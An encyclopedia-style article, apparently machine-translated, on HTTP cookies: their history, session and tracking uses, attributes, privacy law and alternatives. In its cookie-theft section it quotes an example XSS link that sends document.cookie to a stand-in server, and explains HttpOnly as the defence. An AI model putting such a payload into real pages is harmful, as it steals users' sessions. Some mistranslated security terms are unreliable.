A cookie is defined by the HTTP communication protocol as a small text sent by an HTTP server to an HTTP client, which the latter will send back the next time it connects to servers sharing the same domain name.
Invented in 1994, the cookie is a text containing an arbitrary sequence of key-value pairs. It allows websites to track Users as they move from one page of the site to another, or even when they return a few days later in the case of cookies saved on the visitor’s terminal. Cookies are used in particular to identify the session of an Internet user connected to his computer account. More generally, cookies are used to link to a visit any status information, such as display preferences or the contents of a shopping cart.
Cookies have always been more or less controversial because they make it possible to track Internet users visiting seemingly unrelated websites, as long as these sites all use the same web tracking provider, for example, an advertising broadcaster. Most web browsers allow users to manage cookies (storage time, selective deletion). Websites complying with the Directive of July 12, 2002 on the protection of privacy in the electronic communications sector also allow Internet users to selectively accept cookies.
Being usually stored in simple text files, cookies are not executable. They are neither spyware nor viruses. However, cookies that are only used for tracking are detected by several antivirus software programs that offer to delete them.
Historical of HTTP cookie
The term cookie derives from the English term magic cookie, which is a packet of data that a program receives and returns unchanged. Cookies were already used in computer science when Lou Montulli had the idea of using them in web communications in June 1994. At that time, he was an employee of Netscape Communications.
John Giannandrea and Lou Montulli wrote the first Netscape Navigator cookie specification that same year. Version 0.9 Beta of Mosaic Netscape, released on October 13, 1994, incorporated cookie technology. The first use of cookies (excluding experimentation) was made to determine whether visitors to the Netscape website had visited the site before. Montulli filed a patent application for the cookie technology in 1995, and the US patent 5774670 was granted in 1998.
After being implemented in Netscape 0.9 beta in 1994, cookies were integrated into Internet Explorer 2, released in October 1995.
The introduction of cookies has not been widely known to the public. In particular, cookies were accepted by default in browser settings, and users were not informed of their presence. Some people were aware of the existence of cookies around the first quarter of 1995, but the general public did not learn of their existence until after the Financial Times published an article on February 12, 1996. In the same year, cookies received a lot of attention from the media, because of possible intrusions into privacy. The subject of cookies was discussed in two consultations of the US Federal Trade Commission in 1996 and 1997.
The development of the official cookie specification was already underway. The first discussions on the official specification took place in April 1995 on the www-talk mailing list. A special working group of the IETF was formed. Two alternative proposals to introduce a state into HTTP transactions were proposed by Brian Behlendorf and David Kristol respectively, but the group, led by Kristol himself, decided to use the Netscape specification as a starting point. In February 1996, the working group determined that third-party cookies were a significant threat to privacy. The specification produced by the group was eventually released as RFC 2109.
Since the end of 2014, we see a banner about cookies on many sites. There is at least one browser extension that allows the banner not to be displayed.
HTTP Cookie Uses
Session Management
Cookies can be used to maintain data relating to the user during his navigation, but also through several visits. Cookies were introduced to give a way to implement electronic shopping carts, devices that allow the user to accumulate the items he wants to buy while browsing the site.
Nowadays, applications like shopping carts instead save the list of items in a database on a server, which is preferable; than to save them in the cookie itself. The web server sends a cookie containing a unique session ID. The web browser then returns this session ID with each subsequent request and the items in the shopping cart are saved and associated with this same unique session ID.
Cookies are useful when connecting to a site using identifiers:
- The web application sends a cookie containing a unique session ID during the first login;
- The user provides their credentials (usually a username and password) when authenticating;
- The web application validates authentication and allows the user to access the service; the cookie then makes it possible to preserve the memory of the fact that the connection has been validated, and thus avoids asking the user for his login information again each time he accesses.
Customization
Cookies can be used to remember information about the user of a site, with the aim of showing him appropriate content in the future. For example, a web server may send a cookie containing the last username used to log in to that website, so that this username can be pre-populated on future visits.
Many websites use cookies for personalization based on user preferences. Users select their preferences in a form and send them to the server. The server encodes preferences in a cookie and sends it back to the browser. Subsequently, each time the user accesses a page of this site, the browser returns the cookie and therefore the list of preferences; the server can then customize the page according to the user’s preferences. For example, Wikipedia’s website allows its users to choose the site skin they prefer. The Google search engine allows its users (even if they are not registered) to choose the number of results they want to see on each page of results.
Tracking
Tracking cookies (or tracers) are used to track the browsing habits of internet users. This can also be done in part by using the IP address of the computer making a request for a page or using the HTTP “referrer” header that the client sends to each request, but cookies allow for greater accuracy. This can be done as in the following example:
- If the user uses a page of a site, and the request does not contain a cookie, the server assumes that it is the first page visited by the user. The server then creates a random string and sends it to the browser at the same time as the requested page;
- From that moment on, the cookie will be automatically sent by the browser each time a new page of the site is called. The server will send the page as usual but will also record the URL of the page called, the date, the time of the request and the cookie in a log file.
By looking at the log file, it is then possible to see which pages the user visited and in what order. For example, if the file contains a few requests made using the id=abc cookie, this may establish that all of these requests are from the same user. The requested URL, date and time associated with the requests are used to track the user’s navigation.
Third-party cookies and web beacons, explained below, also allow tracking across different sites. Tracking in a single site is usually used for statistical use. On the other hand, tracking in different sites using third-party cookies is usually used by advertising companies to produce anonymous user profiles (which are then used to determine which advertisements should be shown to the user and, if the user’s email address is known, to send him emails corresponding to these advertisements).
Tracking cookies are a risk to the user’s privacy but they can be deleted easily. Most recent browsers include an option to automatically delete cookies that persist when the application is closed.
Third-party cookies
Images and other objects contained in a web page may reside on servers other than the one hosting the page. To view the page, the browser downloads all these objects. Most websites contain information from different sources. For example, if you enter http://www.exemple.com in your browser, there will often be objects or advertisements on a part of the page that will come from different sources, that is, from a domain different from http://www.exemple.com. “First” party cookies are cookies that are set by the domain registered in the address bar of the browser. Third-party cookies are set by one of the objects on the page that come from a different domain.
By default, browsers like Mozilla Firefox, Microsoft Internet Explorer, and Opera accept third-party cookies, but users can change the settings in the browser options to block them. There is no inherent security risk to third-party cookies that allow functionality for the web, however, they are also used to track Users from site to site. Starting in 2022, major players like Google have announced that they will end third-party cookies, which will have major implications for marketing.
Tools such as Ghostery available for all browsers make it possible to block exchanges between third parties.
Implementation
Cookies are small pieces of data sent by the web server to the browser. The browser returns them unchanged to the server, introducing a state (memory of previous events) into the HTTP transaction that would otherwise be stateless. Without cookies, each retrieval of a web page or component of a web page is an isolated event, independent of other requests made on the same site. In addition to being set by the web server, cookies can also be set by scripting languages such as JavaScript, if it is supported and authorized by the browser.
The official cookie specification suggests that browsers are able to save and resend a minimum number of cookies. Specifically, a browser should be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies for the same server or domain.
According to section 3.1 of RFC 2965, cookie names are case insensitive.
A cookie can specify the date of its expiration, in which case the cookie will be deleted on that date. If the cookie does not specify an expiration date, the cookie is deleted as soon as the user exits the browser. As a result, specifying an expiration date is a way to make the cookie survive through multiple sessions.
For this reason, cookies with an expiration date are said to be persistent. An example application: a sales site can use persistent cookies to save the items that users have placed in their shopping cart (in reality, the cookie can refer to an entry saved in a database of the sales site, and not in your computer). Thanks to this means, if users leave their browser without making a purchase and return to it later, they will be able to find the items in the shopping cart again. If these cookies did not give an expiration date, they would expire when the browser was closed, and the information about the contents of the shopping cart would be lost.
Cookies can be limited in scope to a specific domain, subdomain, or path on the server that created them.
Creating a cookie
Web pages are transferred using the hypertext transfer protocol (HTTP). By ignoring cookies, browsers call a page from web servers, usually sending them a short text called an HTTP request. For example, to access the #www.example.org/index.html page, browsers connect to the #www.example.org server and send a request that resembles the following:
| GET /index. html HTTP/1. 1 Host: www. example. org | ||
| browser | → | server |
The server responds by sending the requested page, preceded by similar text, all called http response. This package may contain lines asking the browser to store cookies:
| HTTP/1. 1 200 OK Content-type: text/html Set-Cookie: name=value (HTML page) | ||
| browser | ← | server |
The server only sends the Set-Cookie line, if the server wants the browser to store a cookie. Set-Cookie is a request for the browser to store the string name=value and return it in all future requests to the server. If the browser supports cookies and cookies are allowed in the browser options, the cookie will be included in all subsequent requests made to the same server. For example, the browser calls the #www.example.org/news.html page by sending the following request to the #www.example.org server:
| GET /news. html HTTP/1. 1 Host: www. example. org Cookie: name=value Accept: */* | ||
| browser | → | server |
This is a request for another page on the same server, and differs from the first one above because it contains a string that the server previously sent to the browser. Thanks to this means, the server knows that this request is related to the previous one. The server responds by sending the called page, and also by adding other cookies to it.
The value of the cookie can be changed by the server by sending a new line Set-Cookie: name=nnew_value in response to the page called. The browser then replaces the old value with the new one.
The Set-Cookie line is typically created by a CGI program or other scripting language, not by the HTTP server. The HTTP server (example: Apache) will only transmit the result of the program (a document preceded by the header containing the cookies) to the browser.
Cookies can also be set by JavaScript or other similar languages running in the browser, i.e., on the client side rather than on the server side. In JavaScript, the document.cookie object is used for this purpose. For example, the statement document. cookie = “temperature=20” creates a cookie named “temperature” and a value of 20.
Attributes of a cookie
In addition to the name/value pair, a cookie can also contain an expiration date, a path, a domain name and the type of connection provided, i. e., in clear or encrypted. RFC 2965 also states that cookies must have a mandatory version number, but this is usually omitted. These parts of data follow the pair name= new_value and are separated by semicolons. For example, a cookie can be created by the server by sending a Set-Cookie line: name=new_value; expires=date; path=/; domain=.example.org.
Expiration of a cookie
Cookies expire and are then not sent by the browser to the server in the following situations:
- when the browser is closed, if the cookie is not persistent;
- when the expiry date of the cookie is exceeded;
- when the expiration date of the cookie is changed (by the server or script) to a date of the past;
- when the browser deletes the cookie at the request of the user.
The third situation allows servers or scripts to explicitly delete a cookie. Note that it is possible with the Google Chrome web browser to know the expiration date of a particular cookie by accessing the content settings. A cookie stored on a computer can very well remain there for several decades if no procedure is done to delete it.
Ideas
Since their introduction on the Internet, many ideas about cookies have circulated on the Internet and in the media. In 1998, CIAC, a computer incident monitoring team at the U.S. Department of Energy, determined that the cookie security flaws were “essentially non-existent” and explained that “information about where you came from and the details of the web pages you visited already exists in the log files of the web servers. ” In 2005, Jupiter Research published the results of a study, in which a significant percentage of respondents considered the following claims:
- cookies are like viruses, they infect users’ hard drives;
- cookies generate pop-ups;
- cookies are used to send spam;
- cookies are used only for advertising.
Cookies cannot delete or read information from the user’s computer. However, cookies make it possible to detect the web pages visited by a user on a given site or set of sites. This information may be collected in a user profile that can be used or resold to third parties, which can pose serious privacy concerns. Some profiles are anonymous, in the sense that they do not contain personal information, yet even such profiles may be questionable.
According to the same study, a large percentage of Internet users do not know how to delete cookies. One of the reasons people don’t trust cookies is that some sites have abused the personal identification aspect of cookies and shared this information with other sources. A large percentage of targeted advertising and unsolicited emails, considered spam, come from information gleaned by tracking cookies.
In reality, cookies that were initially not created for the purpose of carrying out commercial advertisements, have given rise to an entire advertising industry that according to the president of the Digital Commission of the Union of Consulting and media buying companies “gives information on Internet users, including their interest in this or that product, maybe an intention to buy. “
The deletion of third-party cookies planned between 2020 and 2022 is intended to limit these disadvantages but could benefit GAFAMs to the detriment of other advertisers, GAFAMs who already hold three-quarters of the French market will be strengthened by better-targeted advertising technologies.
Browser settings
Most browsers support cookies and allow the user to disable them. The most common options are:
- enable or disable cookies completely, so that they are accepted or blocked constantly;
- allow the user to see the active cookies in a given page, by entering javascript: alert(document. cookie) in the address bar of the browser. Some browsers incorporate a cookie manager for the user who can selectively view and delete the cookies currently stored by the browser.
Most browsers also allow a total deletion of personal data which includes cookies. Add-ons to control cookie permissions also exist.
Privacy and third-party cookies
Cookies have important implications for the privacy and anonymity of web users. Although cookies are only sent back to the server that set them or to a server belonging to the same Internet domain, a web page may nevertheless contain images or other components stored on servers belonging to other domains. Cookies that are set during the retrieval of these external components are called third-party cookies. This includes cookies from unwanted pop-ups.
Advertising companies use third-party cookies to track users through the different sites they visit. In particular, an advertising company can track a user through all the pages where it has placed advertising images or a web beacon. Knowledge of the pages visited by the user allows the advertising company to target the user’s advertising preferences.
The ability to build a user profile is considered by some to be an invasion of privacy, especially when tracking is done across different domains using third-party cookies. For this reason, some countries have cookie legislation.
The U. S. government put in place strict rules on setting cookies in 2000, after it was revealed that the White House’s Office of Drug Policy used cookies to track users’ computers watching drug ads online. In 2002, privacy activist Daniel Brandt discovered that the CIA left persistent cookies on computers that had visited its websites. Once informed of this breach, the CIA declared that these cookies were not intentionally sent and stopped setting them up. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had left two persistent cookies on visitors’ computers because of a software update. After being notified, the NSA immediately disabled the cookies.
In the United Kingdom, the “Cookie law“, which came into force on 25 May 2012, requires sites to declare their intentions, allowing users to choose whether or not they want to leave traces of their passage on the internet. This way, they can be protected from ad targeting. However, according to The Guardian, the consent of Internet users is not necessarily explicit; changes have been made to the terms of consent of the user, thus making it implicit.
Legal framework
Directive 2002/58 on privacy
Directive 2002/58 on privacy and electronic communications contains rules on the use of cookies. In particular, Article 5(3) of that directive requires that the storage of data (such as cookies) on the user’s computer can only be done if:
- the user is informed of how the data is used;
- the user is given the opportunity to refuse this storage operation. However, this article also states that the storage of data for technical reasons is exempt from this law.
Having to be implemented from October 2003, however, the Directive was only very imperfectly put into practice according to a report of December 2004, which also pointed out that some Member States (Slovakia, Latvia, Greece, Belgium and Luxembourg) had not yet transposed the Directive into national law.
According to the opinion of the G29 of 2010, this directive, which makes the use of cookies for behavioral advertising purposes conditional on the explicit consent of the Internet user, remains very poorly applied. In fact, most sites do this in a way that does not comply with the directive, limiting themselves to a simple “banner” informing about the use of “cookies” without giving information on uses, without differentiating between “technical” cookies and “tracking” cookies, or offering real choice to the user wishing to maintain technical cookies (such as shopping cart management cookies) and refuse “tracking” cookies. In fact, many sites do not function properly if cookies are refused, which is neither in accordance with Directive 2002/58 nor Directive 95/46 (Protection of personal data).
Directive 2009/136/EC
This matter was updated by Directive 2009/136/EC dated November 25, 2009 which states that the ‘storage of information, or obtaining access to information already stored, in the terminal equipment of a subscriber or user is permitted only if the subscriber or user has given his consent, after having received, in compliance with Directive 95/46/EC, clear and complete information, inter alia on the purposes of the processing”. The new directive, therefore, reinforces the obligations prior to placing cookies on the Internet user’s computer.
In the preliminary considerations of the Directive, however, the European legislator states: “Where technically possible and effective, in accordance with the relevant provisions of Directive 95/46/EC, the user’s consent to the processing may be expressed through the use of the appropriate settings of a browser or other application”. But in fact, no browser to date allows to dissociate the essential technical cookies from the optional ones that should be left to the choice of the user.
This new directive was transposed by Belgian MEPs in July 2012. A 2014 study shows that even MEPs are struggling to apply the constraints of the directive.
Limits of the CNIL
In France, the Council of State considers that the CNIL cannot “legally prohibit (…) “cookies walls”, a practice that consists in blocking access to a website in the event of refusal of cookies”: “By inferring such a prohibition from the sole requirement of a free consent of the user to the deposit of tracers posed by the European regulation on data protection GDPR, the CNIL has exceeded what it could legally do”.
Technical framework
P3P
The P3P specification includes the ability for a server to state a privacy policy, which defines what kind of information it collects and for what purpose. These policies include (but are not limited to) the use of information collected using cookies. According to the definitions of P3P, a browser can accept or reject cookies by comparing privacy policies with the user’s preferences or by asking the user, presenting him with the privacy policy declared by the server.
Many browsers, including Apple Safari and Microsoft Internet Explorer versions 6 and 7, support P3P which allows the browser to determine whether to accept the storage of third-party cookies. The Opera browser allows users to refuse third-party cookies and create a global and specific security profile for Internet domains. Mozilla Firefox version 2 had dropped support for P3P but reinstated it in version 3.
Third-party cookies can be blocked by most browsers in order to increase privacy and reduce advertising tracking, without negatively affecting the user’s web experience. Many advertising agencies offer an opt-out option to targeted advertising, by setting a generic cookie in the browser that disables this targeting but such a solution is not practically effective, when it is respected, because this generic cookie is deleted as soon as the user deletes these cookies which cancels the opt-out decision.
Disadvantages of cookies
In addition to privacy issues, cookies also have some technical drawbacks. In particular, they do not always identify users exactly, they can slow down the performance of sites when in large numbers they can be used for security attacks and they are in opposition to the representative transfer of state, the architectural style of the software.
Inaccurate identification
If more than one browser is used on a computer, in each of them there is always a separate storage unit for cookies. Therefore, cookies do not identify a person, but the combination of a user account, a computer, and a web browser. Thus, anyone can use these accounts, computers, or browsers that have the panoply of cookies. Similarly, cookies do not differentiate between multiple users who share the same user account, the computer, and the browser as in “internet cafes” or any place giving free access to computer resources.
But in practice this statement is misleading in the majority of cases because today a “personal” computer (or a smartphone, or tablet which is worse) is used mostly by a single individual it amounts to targeting a specific person and through the volume of information collected arrive at a personalized targeting even if the person is not “named” identified.
Cookie theft
During normal operation, cookies are returned between the server (or a group of servers in the same domain) and the browser of the user’s computer. Since cookies may contain sensitive information (username, password used for authentication, etc.), their values should not be accessible to other computers. Cookie theft is an act of interception of cookies by an unauthorized third party.
Cookies can be stolen via a packet sniffer in an attack called session hijacking. Traffic on the net can be intercepted and read by computers other than those sending and receiving (especially on the unencrypted Wi-Fi public space). This traffic includes cookies sent over sessions using the ordinary HTTP protocol. When network traffic is not encrypted, malicious users can read the communications of other users on the network using “packet sniffers”.
This problem can be overcome by encrypting the connection between the user’s computer and the server by using the HTTPS protocol. A server can specify a secure flag while setting a cookie; the browser will only send it over a secure line, such as an SSL connection.
However, many sites, although using HTTPS encrypted communication for user authentication (i.e., the login page), later send session cookies and other data normally, through unencrypted HTTP connections for efficiency reasons. Attackers can thus intercept other users’ cookies and impersonate them on appropriate sites or use them in cookie attacks.
Another way to steal cookies is by scripting sites and getting the browser itself to send cookies to malicious servers that never receive them. Modern browsers allow the execution of parts of code searched for from the server. If cookies are accessible during execution, their values can be communicated in some form to the servers that should not access them. Encrypting cookies before they are sent over the network does not help counter the attack.
This type of in-site scripting is typically used by attackers on sites that allow users to publish HTML content. By embedding a compatible piece of code in the HTML contribution, an attacker can receive cookies from other users. Knowledge of these cookies can be used by logging into the same site using the stolen cookies, thus being recognized as the user whose cookies have been stolen.
One way to prevent such attacks is to use the HttpOnly flag; it is an option, introduced in 2002 within version 6 SP1 of Internet Explorer, and available in PHP since version 5.2.0. This option is intended to make the cookie inaccessible to the browser via the execution of scripts (usually javascript). Web developers should take this option into account in their site development so that they are immune to access to cookies, especially session cookies, through the execution of scripts within the user’s browser.
Another security threat used is demand manufacturing in the site.
The official technical specification allows cookies to be sent back only to the servers of the domain from which they originate. However, the value of cookies can be sent to other servers using different means than cookie headers.
In particular, scripting languages like JavaScript are generally allowed to access cookie values and are able to send arbitrary values to any server on the Internet. This scripting capability is used from websites that allow users to post HTML content that other users can see.
For example, an attacker running on the #example.com domain might post a comment containing the following link pointing to a popular blog that they don’t otherwise control:
<a href=”#” onclick=”window.location = ‘#http://example.com/stole.cgi?text='(archive) + escape(document.cookie); return false;” >Click here!</a>
When another user clicks on this link, the browser executes the code part of the onclick attribute, thus replacing the document.cookie character string with the list of user cookies that are active for that page. Therefore, this list of cookies is sent to the server exemple.com, and the attacker is, therefore, able to collect cookies from that user.
This type of attack is difficult to detect on the user side because the script comes from the same domain that set the cookie, and the operation of sending values seems to be allowed by this domain. It is considered that it is the responsibility of administrators operating this type of site to put in place restrictions preventing the publication of malicious code.
Cookies are not directly visible to client-side programs like JavaScript if they were sent with the HttpOnly flag. From the server’s point of view, the only difference is that in the line of the Set-Cookie header is added a new field containing the httponly character string:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.example.net; HttpOnly
When the browser receives such a cookie, it is supposed to use it normally in the next HTTP exchange, but without making it visible to scripts executed on the client side. The HttpOnly flag is not part of any official technical specification, and is not implemented in all browsers. Note that there is currently no way to prevent the XMLHTTPRequest method from reading and writing session cookies.
Changing cookies
As soon as cookies need to be stored and sent back to the server unchanged, an attacker can change the value of the cookies before they are sent back to the server. For example, if a cookie contains the total value that the user must pay for items put in the store cart, by changing this value the server is exposed to the risk of making the attacker pay less than the starting price. The process of changing the value of cookies is called cookie poisoning and can be used after a cookie theft to make the attack persistent.
Most websites, however, only store a session ID — a randomly generated unique number used to identify the session user — in the cookie itself, while all the rest of the information is stored on the server. In this case, this problem is largely solved.
Cookie manipulation between websites
Each site is supposed to have its own cookies, so one site should not be able to modify or create cookies associated with another site. A security flaw in a web browser can allow malicious sites to violate this rule. Exploiting such a flaw is commonly referred to as cross-site cooking. The purpose of such attacks may be the theft of the session ID.
Users should use the latest versions of web browsers in which these vulnerabilities are virtually eliminated.
Contradictory state between client and server
The use of cookies may generate a contradiction between the state of the client and the state stored in the cookie. If the user acquires a cookie and clicks on the “Back” button of the browser, the state of the browser is usually not the same as before this acquisition.
For example, if the shopping cart of an online store is made using cookies, the contents of the cart cannot change when the user returns to the browser history: if the user presses a button to add an item to his cart and clicks on the “Back” button, the item remains in it. This may not be the intention of the user, who certainly wants to undo the addition of the article. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this problem and implement measures to handle situations like this.
Cookie deadline
Permanent cookies have been criticized by privacy security experts for not being intended to expire early enough, and as a result, allow websites to track users and build their profile as they go along. This aspect of cookies is also part of the session hijacking problem because a stolen permanent cookie can be used to impersonate a user for a considerable period of time.
Alternatives to cookies
Some operations that can be performed using cookies can also be carried out using other mechanisms that make it possible to do without cookies or to recreate deleted cookies which creates privacy problems in the same way (or sometimes worse because then invisible) as cookies.
IP address
Users can be tracked with the IP address of the computer calling the page. This technique has been available since the introduction of the World Wide Web, as pages are downloaded the server requests the IP address of the computer running the browser or proxy, if a proxy is used. The server can track this information whether or not there are cookies used. However, these addresses are typically less reliable in identifying a user than cookies because computers and proxies can be shared by multiple users, and the same computer can receive a different IP address on each work session (as is often the case for phone connections).
Tracking by IP addresses can be reliable in certain situations, such as broadband connections that maintain the same IP address for a long time, as long as the current passes.
Some systems like Tor are designed to maintain the anonymity of the Internet and make it impossible or impractical to track by IP address.
URL
A more precise technique is based on embedding information in URLs. The string query part of the URL is one of the techniques that are typically used for this purpose, but other parts can be used as well. Both the Java servlet and PHP session mechanisms use this method if cookies are not enabled.
This method includes the web server that places string requests to links on the web page that carries it when it is sent to the browser. When the user follows a link, the browser returns the attached query string to the server.
The query strings used for this purpose and the cookies are very similar, both being information arbitrarily chosen by the server and returned by the browser. However, there are a few differences: when a URL containing a query string is reused, the same information is sent to the server. For example, if a user’s preferences are encoded in a query string of a URL and the user sends that URL to another user via email, the user will also be able to use those preferences.
On the other hand, when a user accesses the same page twice, there is no guarantee that the same query string will be used both times. For example, if a user arrives on a page from an internal page of the site the first time and arrives on the same page from an external page the second time, the query string for the site page is typically different, whereas cookies are the same.
Other disadvantages of query strings are security-related: keeping data that identifies a session in query strings allows or simplifies session fixation attacks, CRD reference attacks, and other exploits of vulnerabilities. Transferring session credentials as HTTP cookies is more secure.
Hidden form field
One form of session tracking, used by ASP.NET, is to use web forms with hidden fields. This technique is very similar to using URL query strings to carry information and has the same advantages and disadvantages; and if the form is processed with the HTTP GET method, the fields actually become part of the URL of the browser that will send it when submitting the form. But most forms are processed with HTTP POST, which causes the information form, including hidden fields, to be added as an additional entry that is neither a part of the URL nor a cookie.
This approach has two advantages from a tracking perspective: first, tracking information placed in the HTML source code and post input rather than in the URL will allow the average user not to notice this tracking; second, the information session is not copied when the user copies the URL (to save the page to disk or send it via email, for example).
window.name
All common web browsers can store a fairly large amount of data (2 MB to 32 MB) via JavaScript using the DOM property window.name. This data can be used instead of cookie sessions and is also used across domains. The technique can be coupled with JSON objects to store a complex set of session variables on the client side.
The disadvantage is that each separate window or tab will initially have an empty window.name; when browsing by tabs (opening by the user) this means that the individually opened tabs will not have a window name. In addition, window.name can be used to track visitors through different sites which can pose a privacy issue.
In some respects, this can be more secure than cookies, due to the non-involvement of the server, which therefore makes snifferable cookies invulnerable to network attack. However, if special measures are taken to protect the data, it is vulnerable to further attacks, as the data is available through other sites opened in the same window.
HTTP Authentication
HTTP includes basic access authentication protocols and the digestion of access authentication, which allows access to a web page only when the user has given the correct username and password. If the server requests a certificate to grant access to a web page, the browser requests it from the user and once obtained, the browser stores and sends it in all subsequent HTTP requests. This information can be used to track the user.
Shared local object
If a browser includes the Adobe Flash Player plugin, local shared objects can be used for the same purpose as cookies. They can be an attractive choice for web developers because:
- The default size limit for a shared local object is 100 KB.
- security controls are separate from user cookie controls (so local shared objects may be allowed when cookies are not).
This last point, which distinguishes Adobe’s cookie management policy from that of local shared objects, raises questions about the user’s management of its privacy settings: the user must be aware that its management of cookies has no impact on the management of local shared objects, and vice versa.
Another criticism of this system concerns the fact that it can only be used through the Adobe Flash Player plugin which is proprietary and is not a web standard.
Client-side persistence
Some web browsers support scripting based on the persistence mechanism, which allows the page to store information locally for later use. Internet Explorer, for example, supports persistent information in browser history, in favorites, in a format stored in XML, or directly with a web page saved on disk. For Microsoft Internet Explorer 5, there is a user-data method available through DHTML behaviors.
The W3C has introduced in HTML 5 a new JavaScript API for storing client-side data called Web storage and aimed at permanently replacing cookies. It is similar to cookies but with a greatly improved capacity and without storing information in the header of HTTP requests. The API allows two types of web storage: local storage and session storage, similar to persistent cookies and session cookies (with the difference that session cookies expire when the browser is closed while session storage variables expire when the tab is closed), respectively. Web storage is supported by Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 and Opera 10.50.
A different mechanism normally relies on caching browsers (focusing on memory rather than refresh) using JavaScript programs on web pages. For example, a page might contain the <script type=”text/javascript” tag src=”example.js”>. The first time the page loads, the sample program.js is also loaded. At this point, the program remains cached and the visited page is not reloaded a second time.
As a result, if the program contains a global variable (e.g. var id = 3243242;), this identifier remains valid and can be exploited by another JavaScript code again once the page is loaded, or once a page linking the program is loaded. The major disadvantage of this method is that the JavaScript global variable must be static, which means that it cannot be changed or deleted as a cookie.
Web browser fingerprint
A browser fingerprint is an information collected about a browser’s configuration settings for identification purposes. These fingerprints can be used to fully or partially identify an internet user or device even when cookies are disabled.
Basic information about the configuration of web browsers has long been collected by a website’s audience services with the aim of accurately measuring human traffic on the web and detecting different forms of click fraud. With the help of client-side scripting languages, much more accurate information gathering is now possible. Converting this information into a bit string produces a device fingerprint. In 2010, the Electronic Frontier Foundation (EFF) measured that the entropy of a browser’s fingerprint was at least 18.1 bits, and that was before advances in canvas fingerprinting added 5. 7 bits to that entropy.
Advertiser Id (IDFA)
Apple uses a tracking technique called “identifier for advertisers” (IDFA). This technique assigns a unique identifier to each user of a tool running on iOS (e.g. iPhone or iPad). This identifier is then used by Apple’s advertising network, iAd, to determine which ad users are viewing and responding to.
In brief
Cookies are small text files stored by the web browser on the hard drive of the visitor of a website and which are used (among other things) to record information about the visitor or his journey through the site. The webmaster can thus recognize the habits of a visitor and personalize the presentation of his site for each visitor; cookies then make it possible to keep in memory how many articles must be displayed on the home page or to retain the login credentials to a possible private party: when the visitor returns to the site, it is no longer necessary for him to type his name and password to be recognized, since they are automatically read in the cookie.
A cookie has a limited lifespan, set by the site designer. They can also expire at the end of the session on the site, which corresponds to the closing of the browser. Cookies are widely used to simplify visitors’ lives and present them with more relevant information. But special techniques make it possible to follow a visitor on several sites and thus to collect and cross-check very extensive information on his habits. This method has given the use of cookies a reputation as a surveillance technique violating the privacy of visitors, which unfortunately corresponds to the reality in many use cases for reasons that are not “technical” or not respectful of users’ expectations.
In response to these legitimate fears, HTML 5 introduces a new client-side data storage JavaScript API called Web storage, much safer and with greater capacity, which aims to replace cookies.
Storage of cookies
With some browsers, a cookie is easily modifiable, as text editor software (e.g., Notepad) is enough to change its values manually.
Cookies are stored differently depending on the browser:
- Microsoft Internet Explorer saves each cookie in a different file;
- Mozilla Firefox saves all its cookies in a single file;
- Opera saves all its cookies in a single file and the number (impossible to modify them except from the software options);
- Apple Safari saves all its cookies in a single file with the “.plist” extension. Modification is possible but very difficult, unless you go through the software options.
Browsers are required to support at least:
- 300 simultaneous cookies;
- 4,096 bytes per cookie;
- 20 cookies per host or domain.
References (sources)
|
